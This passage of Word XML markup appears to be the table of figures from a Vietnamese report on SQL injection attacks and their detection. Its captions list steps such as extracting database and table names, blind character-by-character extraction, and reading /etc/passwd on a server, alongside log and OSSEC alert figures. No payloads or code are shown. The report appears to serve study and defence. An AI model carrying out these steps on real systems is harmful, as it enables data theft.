          <w:instrText xml:space="preserve"> PAGEREF _Toc458436416 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</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7" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 5: Lấy thông tin về tên CSDL</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436417 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</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8" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 6: Lấy thông tin về tên bảng</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436418 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</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19" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 7: Kết quả trả về của mệnh đề UNION.</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436419 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</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0" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 8: Kết quả ghép nối dữ liệu</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436420 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</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1" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 9: Đọc file /etc/passwd trên máy chủ.</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436421 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</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2" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 10: Access log của web server l</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ư</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>u thông tin về mã tấn công SQL injection</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436422 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</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3" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 11: Cảnh báo OSSEC về tấn công SQL injeciton</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436423 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</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4" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 12: Thuật toán tìm kiếm nhị phân</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436424 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</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5" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 13: Ví dụ với từ CHARACTER_SET</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436425 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</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6" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 14: So sánh số l</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ư</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ợng yêu cầu cần gửi trong 03 ph</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ươ</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ng pháp</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436426 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</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7" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 15: Cấu trúc mệnh đề SELECT</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436427 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</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8" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 16: Câu lệnh tạo bảng users</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436428 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</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29" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 17: Kết quả trả về của bảng users</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436429 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</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0" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 18: Mã nguồn ch</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ươ</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ng trình</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436430 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</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1" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 19: Tr</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ư</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ờng hợp đúng (‘s’ = ‘s’). Sắp xếp theo cột id.</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436431 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</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2" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 20: Tr</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ư</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ờng hợp đúng (‘s’ != ‘A’). Sắp xếp theo cột point.</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436432 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</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3" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 21: Áp dụng lấy ký tự đầu tiên trong tên CSDL.</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436433 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</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4" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 22: Sử dụng biến, thay thế sử dụng cột id</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436434 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</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5" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 23:  Lấy nhiều h</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ơ</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>n một ký tự trong một yêu cầu</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436435 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</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6" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 24: Dòng code gây ra lỗi SQL injection</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436436 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
